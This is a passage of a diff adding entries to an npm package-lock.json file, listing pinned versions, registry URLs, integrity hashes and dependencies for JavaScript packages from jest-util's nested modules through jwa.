"4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/jest-util/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/jest-util/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/jest-worker": { + "version": "27.5.1", + "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-27.5.1.tgz", + "integrity": "sha512-7vuh85V5cdDofPyxn58nrPjBktZo0u9x1g8WtjQol+jZDaE+fhN+cIvTj11GndBnMnyfrUOG1sZQxCdjKh+DKg==", + "dev": true, + "dependencies": { + "@types/node": "*", + "merge-stream": "^2.0.0", + "supports-color": "^8.0.0" + }, + "engines": { + "node": ">= 10.13.0" + } + }, + "node_modules/jiti": { + "version": "1.18.2", + "resolved": "https://registry.npmjs.org/jiti/-/jiti-1.18.2.tgz", + "integrity": "sha512-QAdOptna2NYiSSpv0O/BwoHBSmz4YhpzJHyi+fnMRTXFjp7B8i/YG5Z8IfusxB1ufjcD2Sre1F3R+nX3fvy7gg==", + "dev": true, + "bin": { + "jiti": "bin/jiti.js" + } + }, + "node_modules/jmespath": { + "version": "0.16.0", + "resolved": "https://registry.npmjs.org/jmespath/-/jmespath-0.16.0.tgz", + "integrity": "sha512-9FzQjJ7MATs1tSpnco1K6ayiYE3figslrXA72G2HQ/n76RzvYlofyi5QM+iX4YRs/pu3yzxlVQSST23+dMDknw==", + "engines": { + "node": ">= 0.6.0" + } + }, + "node_modules/joi": { + "version": "17.12.0", + "resolved": "https://registry.npmjs.org/joi/-/joi-17.12.0.tgz", + "integrity": "sha512-HSLsmSmXz+PV9PYoi3p7cgIbj06WnEBNT28n+bbBNcPZXZFqCzzvGqpTBPujx/Z0nh1+KNQPDrNgdmQ8dq0qYw==", + "dependencies": { + "@hapi/hoek": "^9.3.0", + "@hapi/topo": "^5.1.0", + "@sideway/address": "^4.1.4", + "@sideway/formula": "^3.0.1", + "@sideway/pinpoint": "^2.0.0" + } + }, + "node_modules/jose": { + "version": "4.15.5", + "resolved": "https://registry.npmjs.org/jose/-/jose-4.15.5.tgz", + "integrity": "sha512-jc7BFxgKPKi94uOvEmzlSWFFe2+vASyXaKUpdQKatWAESU2MWjDfFf0fdfc83CDKcA5QecabZeNLyfhe3yKNkg==", + "funding": { + "url": "https://github.com/sponsors/panva" + } + }, + "node_modules/jquery": { + "version": "3.7.1", + "resolved": "https://registry.npmjs.org/jquery/-/jquery-3.7.1.tgz", + "integrity": "sha512-m4avr8yL8kmFN8psrbFFFmB/If14iN5o9nw/NgnnM+kybDJpRsAynV2BsfpTYrTRysYUdADVD7CkUUizgkpLfg==" + }, + "node_modules/js-beautify": { + "version": "1.14.7", + "resolved": "https://registry.npmjs.org/js-beautify/-/js-beautify-1.14.7.tgz", + "integrity": "sha512-5SOX1KXPFKx+5f6ZrPsIPEY7NwKeQz47n3jm2i+XeHx9MoRsfQenlOP13FQhWvg8JRS0+XLO6XYUQ2GX+q+T9A==", + "dev": true, + "dependencies": { + "config-chain": "^1.1.13", + "editorconfig": "^0.15.3", + "glob": "^8.0.3", + "nopt": "^6.0.0" + }, + 
"bin": { + "css-beautify": "js/bin/css-beautify.js", + "html-beautify": "js/bin/html-beautify.js", + "js-beautify": "js/bin/js-beautify.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/js-beautify/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dev": true, + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/js-beautify/node_modules/glob": { + "version": "8.1.0", + "resolved": "https://registry.npmjs.org/glob/-/glob-8.1.0.tgz", + "integrity": "sha512-r8hpEjiQEYlF2QU0df3dS+nxxSIreXQS1qRhMJM0Q5NDdR386C7jb7Hwwod8Fgiuex+k0GFjgft18yvxm5XoCQ==", + "dev": true, + "dependencies": { + "fs.realpath": "^1.0.0", + "inflight": "^1.0.4", + "inherits": "2", + "minimatch": "^5.0.1", + "once": "^1.3.0" + }, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/js-beautify/node_modules/minimatch": { + "version": "5.1.6", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.6.tgz", + "integrity": "sha512-lKwV/1brpG6mBUFHtb7NUmtABCb2WZZmm2wNiOA5hAb8VdCS4B3dtMWyvcoViccwAW/COERjXLt0zP1zXUN26g==", + "dev": true, + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/js-beautify/node_modules/nopt": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/nopt/-/nopt-6.0.0.tgz", + "integrity": "sha512-ZwLpbTgdhuZUnZzjd7nb1ZV+4DoiC6/sfiVKok72ym/4Tlf+DFdlHYmT2JPmcNNWV6Pi3SDf1kT+A4r9RTuT9g==", + "dev": true, + "dependencies": { + "abbrev": "^1.0.0" + }, + "bin": { + "nopt": "bin/nopt.js" + }, + "engines": { + "node": "^12.13.0 || ^14.15.0 || >=16.0.0" + } + }, + "node_modules/js-stringify": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/js-stringify/-/js-stringify-1.0.2.tgz", + "integrity": "sha512-rtS5ATOo2Q5k1G+DADISilDA6lv79zIiwFd6CcjuIxGKLFm5C+RLImRscVap9k55i+MOZwgliw+NejvkLuGD5g==" + }, + "node_modules/js-tokens": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", + "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==" + }, + "node_modules/js-yaml": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", + "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", + "dependencies": { + "argparse": "^2.0.1" + }, + "bin": { + "js-yaml": "bin/js-yaml.js" + } + }, + "node_modules/js2xmlparser": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/js2xmlparser/-/js2xmlparser-4.0.2.tgz", + "integrity": "sha512-6n4D8gLlLf1n5mNLQPRfViYzu9RATblzPEtm1SthMX1Pjao0r9YI9nw7ZIfRxQMERS87mcswrg+r/OYrPRX6jA==", + "dependencies": { + "xmlcreate": "^2.0.4" + } + }, + "node_modules/jsbn": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", + "integrity": "sha1-peZUwuWi3rXyAdls77yoDA7y9RM=" + }, + "node_modules/jscodeshift": { + "version": "17.0.0", + "resolved": "https://registry.npmjs.org/jscodeshift/-/jscodeshift-17.0.0.tgz", + "integrity": "sha512-Af+MFsNwLSVO+t4kKjJdJKh6iNbNHfDfFGdyltJ2wUFN3furgbvHguJmB85iou+fY7wbHgI8eiEKpp6doGgtKg==", + "dev": true, + "dependencies": { + "@babel/core": "^7.24.7", + "@babel/parser": "^7.24.7", + "@babel/plugin-transform-class-properties": 
"^7.24.7", + "@babel/plugin-transform-modules-commonjs": "^7.24.7", + "@babel/plugin-transform-nullish-coalescing-operator": "^7.24.7", + "@babel/plugin-transform-optional-chaining": "^7.24.7", + "@babel/plugin-transform-private-methods": "^7.24.7", + "@babel/preset-flow": "^7.24.7", + "@babel/preset-typescript": "^7.24.7", + "@babel/register": "^7.24.6", + "flow-parser": "0.*", + "graceful-fs": "^4.2.4", + "micromatch": "^4.0.7", + "neo-async": "^2.5.0", + "picocolors": "^1.0.1", + "recast": "^0.23.9", + "temp": "^0.9.4", + "write-file-atomic": "^5.0.1" + }, + "bin": { + "jscodeshift": "bin/jscodeshift.js" + }, + "engines": { + "node": ">=16" + }, + "peerDependencies": { + "@babel/preset-env": "^7.1.6" + }, + "peerDependenciesMeta": { + "@babel/preset-env": { + "optional": true + } + } + }, + "node_modules/jscodeshift/node_modules/rimraf": { + "version": "2.6.3", + "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.6.3.tgz", + "integrity": "sha512-mwqeW5XsA2qAejG46gYdENaxXjx9onRNCfn7L0duuP4hCuTIi/QO7PDK07KJfp1d+izWPrzEJDcSqBa0OZQriA==", + "deprecated": "Rimraf versions prior to v4 are no longer supported", + "dev": true, + "dependencies": { + "glob": "^7.1.3" + }, + "bin": { + "rimraf": "bin.js" + } + }, + "node_modules/jscodeshift/node_modules/temp": { + "version": "0.9.4", + "resolved": "https://registry.npmjs.org/temp/-/temp-0.9.4.tgz", + "integrity": "sha512-yYrrsWnrXMcdsnu/7YMYAofM1ktpL5By7vZhf15CrXijWWrEYZks5AXBudalfSWJLlnen/QUJUB5aoB0kqZUGA==", + "dev": true, + "dependencies": { + "mkdirp": "^0.5.1", + "rimraf": "~2.6.2" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/jsdoc": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/jsdoc/-/jsdoc-4.0.3.tgz", + "integrity": "sha512-Nu7Sf35kXJ1MWDZIMAuATRQTg1iIPdzh7tqJ6jjvaU/GfDf+qi5UV8zJR3Mo+/pYFvm8mzay4+6O5EWigaQBQw==", + "dependencies": { + "@babel/parser": "^7.20.15", + "@jsdoc/salty": "^0.2.1", + "@types/markdown-it": "^14.1.1", + "bluebird": "^3.7.2", + "catharsis": "^0.9.0", + "escape-string-regexp": "^2.0.0", + "js2xmlparser": "^4.0.2", + "klaw": "^3.0.0", + "markdown-it": "^14.1.0", + "markdown-it-anchor": "^8.6.7", + "marked": "^4.0.10", + "mkdirp": "^1.0.4", + "requizzle": "^0.2.3", + "strip-json-comments": "^3.1.0", + "underscore": "~1.13.2" + }, + "bin": { + "jsdoc": "jsdoc.js" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/jsdoc-type-pratt-parser": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/jsdoc-type-pratt-parser/-/jsdoc-type-pratt-parser-4.1.0.tgz", + "integrity": "sha512-Hicd6JK5Njt2QB6XYFS7ok9e37O8AYk3jTcppG4YVQnYjOemymvTcmc7OWsmq/Qqj5TdRFO5/x/tIPmBeRtGHg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/jsdoc/node_modules/escape-string-regexp": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", + "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", + "engines": { + "node": ">=8" + } + }, + "node_modules/jsdoc/node_modules/mkdirp": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-1.0.4.tgz", + "integrity": "sha512-vVqVZQyf3WLx2Shd0qJ9xuvqgAyKPLAiqITEtqW0oIUjzo3PePDd6fW9iFz30ef7Ysp/oiWqbhszeGWW2T6Gzw==", + "bin": { + "mkdirp": "bin/cmd.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/jsdom": { + "version": "19.0.0", + "resolved": "https://registry.npmjs.org/jsdom/-/jsdom-19.0.0.tgz", + "integrity": 
"sha512-RYAyjCbxy/vri/CfnjUWJQQtZ3LKlLnDqj+9XLNnJPgEGeirZs3hllKR20re8LUZ6o1b1X4Jat+Qd26zmP41+A==", + "dev": true, + "dependencies": { + "abab": "^2.0.5", + "acorn": "^8.5.0", + "acorn-globals": "^6.0.0", + "cssom": "^0.5.0", + "cssstyle": "^2.3.0", + "data-urls": "^3.0.1", + "decimal.js": "^10.3.1", + "domexception": "^4.0.0", + "escodegen": "^2.0.0", + "form-data": "^4.0.0", + "html-encoding-sniffer": "^3.0.0", + "http-proxy-agent": "^5.0.0", + "https-proxy-agent": "^5.0.0", + "is-potential-custom-element-name": "^1.0.1", + "nwsapi": "^2.2.0", + "parse5": "6.0.1", + "saxes": "^5.0.1", + "symbol-tree": "^3.2.4", + "tough-cookie": "^4.0.0", + "w3c-hr-time": "^1.0.2", + "w3c-xmlserializer": "^3.0.0", + "webidl-conversions": "^7.0.0", + "whatwg-encoding": "^2.0.0", + "whatwg-mimetype": "^3.0.0", + "whatwg-url": "^10.0.0", + "ws": "^8.2.3", + "xml-name-validator": "^4.0.0" + }, + "engines": { + "node": ">=12" + }, + "peerDependencies": { + "canvas": "^2.5.0" + }, + "peerDependenciesMeta": { + "canvas": { + "optional": true + } + } + }, + "node_modules/jsdom-global": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/jsdom-global/-/jsdom-global-3.0.2.tgz", + "integrity": "sha1-a9KZwTsMRiay2iwDk81DhdYGrLk=", + "dev": true, + "peerDependencies": { + "jsdom": ">=10.0.0" + } + }, + "node_modules/jsdom/node_modules/acorn": { + "version": "8.7.0", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.7.0.tgz", + "integrity": "sha512-V/LGr1APy+PXIwKebEWrkZPwoeoF+w1jiOBUmuxuiUIaOHtob8Qc9BTrYo7VuI5fR8tqsy+buA2WFooR5olqvQ==", + "dev": true, + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/jsdom/node_modules/tr46": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-3.0.0.tgz", + "integrity": "sha512-l7FvfAHlcmulp8kr+flpQZmVwtu7nfRV7NZujtN0OqES8EL4O4e0qqzL0DC5gAvx/ZC/9lk6rhcUwYvkBnBnYA==", + "dev": true, + "dependencies": { + "punycode": "^2.1.1" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/jsdom/node_modules/whatwg-url": { + "version": "10.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-10.0.0.tgz", + "integrity": "sha512-CLxxCmdUby142H5FZzn4D8ikO1cmypvXVQktsgosNy4a4BHrDHeciBBGZhb0bNoR5/MltoCatso+vFjjGx8t0w==", + "dev": true, + "dependencies": { + "tr46": "^3.0.0", + "webidl-conversions": "^7.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/jsesc": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-3.1.0.tgz", + "integrity": "sha512-/sM3dO2FOzXjKQhJuo0Q173wf2KOo8t4I8vHy6lF9poUp7bKT0/NHE8fPX23PwfhnykfqnC2xRxOnVw5XuGIaA==", + "dev": true, + "license": "MIT", + "bin": { + "jsesc": "bin/jsesc" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/json-bigint": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-bigint/-/json-bigint-1.0.0.tgz", + "integrity": "sha512-SiPv/8VpZuWbvLSMtTDU8hEfrZWg/mH/nV/b4o0CYbSxu1UIQPLdwKOCIyLQX+VIPO5vrLX3i8qtqFyhdPSUSQ==", + "dependencies": { + "bignumber.js": "^9.0.0" + } + }, + "node_modules/json-buffer": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/json-buffer/-/json-buffer-3.0.1.tgz", + "integrity": "sha512-4bV5BfR2mqfQTJm+V5tPPdf+ZpuhiIvTuAB5g8kcrXOZpTT/QwwVRWBywX1ozr6lEuPdbHxwaJlm9G6mI2sfSQ==", + "dev": true, + "peer": true + }, + "node_modules/json-parse-better-errors": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/json-parse-better-errors/-/json-parse-better-errors-1.0.2.tgz", + "integrity": 
"sha512-mrqyZKfX5EhL7hvqcV6WG1yYjnjeuYDzDhhcAAUrq8Po85NBQBJP+ZDUT75qZQ98IkUoBqdkExkukOU7Ts2wrw==", + "dev": true + }, + "node_modules/json-parse-even-better-errors": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", + "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", + "dev": true + }, + "node_modules/json-ptr": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/json-ptr/-/json-ptr-3.1.1.tgz", + "integrity": "sha512-SiSJQ805W1sDUCD1+/t1/1BIrveq2Fe9HJqENxZmMCILmrPI7WhS/pePpIOx85v6/H2z1Vy7AI08GV2TzfXocg==" + }, + "node_modules/json-refs": { + "version": "3.0.15", + "resolved": "https://registry.npmjs.org/json-refs/-/json-refs-3.0.15.tgz", + "integrity": "sha512-0vOQd9eLNBL18EGl5yYaO44GhixmImes2wiYn9Z3sag3QnehWrYWlB9AFtMxCL2Bj3fyxgDYkxGFEU/chlYssw==", + "dependencies": { + "commander": "~4.1.1", + "graphlib": "^2.1.8", + "js-yaml": "^3.13.1", + "lodash": "^4.17.15", + "native-promise-only": "^0.8.1", + "path-loader": "^1.0.10", + "slash": "^3.0.0", + "uri-js": "^4.2.2" + }, + "bin": { + "json-refs": "bin/json-refs" + }, + "engines": { + "node": ">=0.8" + } + }, + "node_modules/json-refs/node_modules/argparse": { + "version": "1.0.10", + "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", + "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", + "dependencies": { + "sprintf-js": "~1.0.2" + } + }, + "node_modules/json-refs/node_modules/js-yaml": { + "version": "3.14.1", + "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", + "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", + "dependencies": { + "argparse": "^1.0.7", + "esprima": "^4.0.0" + }, + "bin": { + "js-yaml": "bin/js-yaml.js" + } + }, + "node_modules/json-refs/node_modules/slash": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", + "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", + "engines": { + "node": ">=8" + } + }, + "node_modules/json-schema": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", + "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" + }, + "node_modules/json-schema-traverse": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", + "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" + }, + "node_modules/json-stable-stringify": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/json-stable-stringify/-/json-stable-stringify-1.1.1.tgz", + "integrity": "sha512-SU/971Kt5qVQfJpyDveVhQ/vya+5hvrjClFOcr8c0Fq5aODJjMwutrOfCU+eCnVD5gpx1Q3fEqkyom77zH1iIg==", + "dependencies": { + "call-bind": "^1.0.5", + "isarray": "^2.0.5", + "jsonify": "^0.0.1", + "object-keys": "^1.1.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/json-stable-stringify-without-jsonify": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/json-stable-stringify-without-jsonify/-/json-stable-stringify-without-jsonify-1.0.1.tgz", + "integrity": "sha1-nbe1lJatPzz+8wp1FC0tkwrXJlE=" + }, + 
"node_modules/json-stringify-safe": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", + "integrity": "sha1-Epai1Y/UXxmg9s4B1lcB4sc1tus=" + }, + "node_modules/json2csv": { + "version": "4.5.4", + "resolved": "https://registry.npmjs.org/json2csv/-/json2csv-4.5.4.tgz", + "integrity": "sha512-YxBhY4Lmn8IvVZ36nqg5omxneLy9JlorkqW1j/EDCeqvmi+CQ4uM+wsvXlcIqvGDewIPXMC/O/oF8DX9EH5aoA==", + "dependencies": { + "commander": "^2.15.1", + "jsonparse": "^1.3.1", + "lodash.get": "^4.4.2" + }, + "bin": { + "json2csv": "bin/json2csv.js" + } + }, + "node_modules/json2csv/node_modules/commander": { + "version": "2.20.3", + "resolved": "https://registry.npmjs.org/commander/-/commander-2.20.3.tgz", + "integrity": "sha512-GpVkmM8vF2vQUkj2LvZmD35JxeJOLCwJ9cUkugyk2nuhbv3+mJvpLYYt+0+USMxE+oj+ey/lJEnhZw75x/OMcQ==" + }, + "node_modules/json5": { + "version": "2.2.3", + "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", + "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", + "dev": true, + "bin": { + "json5": "lib/cli.js" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/jsonfile": { + "version": "6.1.0", + "resolved": "https://registry.npmjs.org/jsonfile/-/jsonfile-6.1.0.tgz", + "integrity": "sha512-5dgndWOriYSm5cnYaJNhalLNDKOqFwyDB/rr1E9ZsGciGvKPs8R2xYGCacuf3z6K1YKDz182fd+fY3cn3pMqXQ==", + "dependencies": { + "universalify": "^2.0.0" + }, + "optionalDependencies": { + "graceful-fs": "^4.1.6" + } + }, + "node_modules/jsonify": { + "version": "0.0.1", + "resolved": "https://registry.npmjs.org/jsonify/-/jsonify-0.0.1.tgz", + "integrity": "sha512-2/Ki0GcmuqSrgFyelQq9M05y7PS0mEwuIzrf3f1fPqkVDVRvZrPZtVSMHxdgo8Aq0sxAOb/cr2aqqA3LeWHVPg==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/jsonparse": { + "version": "1.3.1", + "resolved": "https://registry.npmjs.org/jsonparse/-/jsonparse-1.3.1.tgz", + "integrity": "sha1-P02uSpH6wxX3EGL4UhzCOfE2YoA=", + "engines": [ + "node >= 0.2.0" + ] + }, + "node_modules/jsonwebtoken": { + "version": "9.0.2", + "resolved": "https://registry.npmjs.org/jsonwebtoken/-/jsonwebtoken-9.0.2.tgz", + "integrity": "sha512-PRp66vJ865SSqOlgqS8hujT5U4AOgMfhrwYIuIhfKaoSCZcirrmASQr8CX7cUg+RMih+hgznrjp99o+W4pJLHQ==", + "dependencies": { + "jws": "^3.2.2", + "lodash.includes": "^4.3.0", + "lodash.isboolean": "^3.0.3", + "lodash.isinteger": "^4.0.4", + "lodash.isnumber": "^3.0.3", + "lodash.isplainobject": "^4.0.6", + "lodash.isstring": "^4.0.1", + "lodash.once": "^4.0.0", + "ms": "^2.1.1", + "semver": "^7.5.4" + }, + "engines": { + "node": ">=12", + "npm": ">=6" + } + }, + "node_modules/jsonwebtoken/node_modules/jwa": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/jwa/-/jwa-1.4.1.tgz", + "integrity": "sha512-qiLX/xhEEFKUAJ6FiBMbes3w9ATzyk5W7Hvzpa/SLYdxNtng+gcurvrI7TbACjIXlsJyr05/S1oUhZrc63evQA==", + "dependencies": { + "buffer-equal-constant-time": "1.0.1", + "ecdsa-sig-formatter": "1.0.11", + "safe-buffer": "^5.0.1" + } + }, + "node_modules/jsonwebtoken/node_modules/jws": { + "version": "3.2.2", + "resolved": "https://registry.npmjs.org/jws/-/jws-3.2.2.tgz", + "integrity": "sha512-YHlZCB6lMTllWDtSPHz/ZXTsi8S00usEV6v1tjq8tOUZzw7DpSDWVXjXDre6ed1w/pd495ODpHZYSdkRTsa0HA==", + "dependencies": { + "jwa": "^1.4.1", + "safe-buffer": "^5.0.1" + } + }, + "node_modules/jsonwebtoken/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + 
"integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/jsonwebtoken/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/jsonwebtoken/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/jsprim": { + "version": "1.4.2", + "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", + "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", + "dependencies": { + "assert-plus": "1.0.0", + "extsprintf": "1.3.0", + "json-schema": "0.4.0", + "verror": "1.10.0" + }, + "engines": { + "node": ">=0.6.0" + } + }, + "node_modules/jsprim/node_modules/assert-plus": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", + "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=", + "engines": { + "node": ">=0.8" + } + }, + "node_modules/jstransformer": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/jstransformer/-/jstransformer-1.0.0.tgz", + "integrity": "sha1-7Yvwkh4vPx7U1cGkT2hwntJHIsM=", + "dependencies": { + "is-promise": "^2.0.0", + "promise": "^7.0.1" + } + }, + "node_modules/jsx-ast-utils": { + "version": "3.3.3", + "resolved": "https://registry.npmjs.org/jsx-ast-utils/-/jsx-ast-utils-3.3.3.tgz", + "integrity": "sha512-fYQHZTZ8jSfmWZ0iyzfwiU4WDX4HpHbMCZ3gPlWYiCl3BoeOTsqKBqnTVfH2rYT7eP5c3sVbeSPHnnJOaTrWiw==", + "dev": true, + "dependencies": { + "array-includes": "^3.1.5", + "object.assign": "^4.1.3" + }, + "engines": { + "node": ">=4.0" + } + }, + "node_modules/just-debounce-it": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/just-debounce-it/-/just-debounce-it-1.1.0.tgz", + "integrity": "sha512-87Nnc0qZKgBZuhFZjYVjSraic0x7zwjhaTMrCKlj0QYKH6lh0KbFzVnfu6LHan03NO7J8ygjeBeD0epejn5Zcg==", + "dev": true, + "license": "MIT" + }, + "node_modules/just-extend": { + "version": "4.2.1", + "resolved": "https://registry.npmjs.org/just-extend/-/just-extend-4.2.1.tgz", + "integrity": "sha512-g3UB796vUFIY90VIv/WX3L2c8CS2MdWUww3CNrYmqza1Fg0DURc2K/O4YrnklBdQarSJ/y8JnJYDGc+1iumQjg==", + "dev": true + }, + "node_modules/just-once": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/just-once/-/just-once-1.1.0.tgz", + "integrity": "sha512-+rZVpl+6VyTilK7vB/svlMPil4pxqIJZkbnN7DKZTOzyXfun6ZiFeq2Pk4EtCEHZ0VU4EkdFzG8ZK5F3PErcDw==", + "dev": true, + "license": "MIT" + }, + "node_modules/jwa": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/jwa/-/jwa-2.0.0.tgz", + "integrity": 